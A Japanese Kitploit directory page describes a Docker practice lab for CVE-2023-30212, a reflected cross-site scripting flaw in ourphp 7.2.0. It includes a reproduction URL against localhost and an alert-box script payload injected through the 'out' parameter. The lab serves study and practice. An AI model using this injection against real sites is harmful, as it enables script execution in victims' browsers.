Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-30212-POC-DOCKER-FILE — このリポジトリは、CVE-2023-30212脆弱性をシミュレーションするためのDockerコンテナを提供し、その影響を練習し理解することができます。これには、自分のコンピュータ上にコンテナをセットアップするための包括的なガイドが含まれています。Docker作成プロセスのドキュメントも含まれています。 | Kitploit
ツール/GitHubGitHub/rishipatidar/cve-2023-30212-poc-docker-file
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティ学習と教育ラボと実践
GitHubrishipatidar/cve-2023-30212-poc-docker-file

CVE-2023-30212-POC-DOCKER-FILE

このリポジトリは、CVE-2023-30212脆弱性をシミュレーションするためのDockerコンテナを提供し、その影響を練習し理解することができます。これには、自分のコンピュータ上にコンテナをセットアップするための包括的なガイドが含まれています。Docker作成プロセスのドキュメントも含まれています。

リポジトリを見る
1113年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-30212 POC : クロスサイトスクリプティング

/client/manage/ourphp_out.php 経由

CVE-2023-30212 の影響を受ける製品 :

ベンダー製品バージョン
ourphpourphp7.2.0

Docker インストールガイド :

Docker内にOURPHP <= 7.2.0をインストールするには、guide を使用して練習用にDockerをインストールできます。

脆弱性の説明:

root@kitploit:~
# ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting). 
# In the file /client/manage/ourphp_out.php, there is a direct echo functionality that, along with controllable variables, can enable attackers to execute XSS code.When the ourphp_admin parameter is set to "logout," we echo a controllable variable called "out." 
# To exploit this, we prepend a script tag and close it, forming our payload.This vulnerability can be exploited through the "out" parameter by injecting the following script: "</script><script>alert(xss)</script>"

問題の再現手順:

root@kitploit:~
# After completing the setup of the docker directly. Access the following path :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

脆弱性のペイロード:

root@kitploit:~
# </script><script>alert(`xss`)</script>

動画

CVE-2023-30212

参考文献

  1. NIST
  2. cve.mitre.org
  3. Ourphp =>7.2.0 --> 参考コード
ツールをダウンロード